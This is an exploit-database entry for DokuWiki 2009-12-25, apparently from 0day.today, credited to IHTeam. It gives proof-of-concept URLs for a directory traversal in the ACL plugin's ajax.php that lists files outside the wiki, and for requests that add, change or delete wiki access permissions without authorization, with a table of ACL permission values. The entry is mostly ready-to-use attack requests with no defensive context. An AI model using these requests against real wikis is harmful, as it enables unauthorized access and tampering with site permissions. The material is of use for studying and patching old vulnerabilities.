dokuwiki 2009-12-25 Multiple Vulnerabilities

2010-01-14T00:00:00
ID 1337DAY-ID-10673
Type zdt
Reporter IHTeam
Modified 2010-01-14T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ============================================
dokuwiki 2009-12-25 Multiple Vulnerabilities
============================================

--------------------  Show Outside Directory
 
PoC :
 
     http://server/plugins/acl/ajax.php?ajax=tree&ns=../pages/
 
     The bug allows listing the names of arbitrary file on the webserver
- NOT THEIR CONTENTS.
 
 
--------------------  Arbitrary Change or Delete Wiki Permission
 
PoC :
 
      
http://server/lib/plugins/acl/ajax.php?ajax=info&id=wiki&[email protected]&cmd[save]=1&acl=(ACL)
 
             add to acl.auth.php read or write authorization.
 
      
http://server/lib/plugins/acl/ajax.php?ajax=info&id=wiki&[email protected]&cmd[del]=1&acl=(ACL)
             delete from acl.auth.php an eventually authorization like
(ACL).
 
      
http://server/lib/plugins/acl/ajax.php?ajax=info&id=wiki&[email protected]&cmd[update]=1&acl=(ACL)
             delete from acl.auth.php all authorization like (ACL).
 
     where (ACL) must be:
         1     -> read
         2     -> modified
         4     -> creation
         8     -> upload
         16     -> delete





#  0day.today [2018-01-02]  #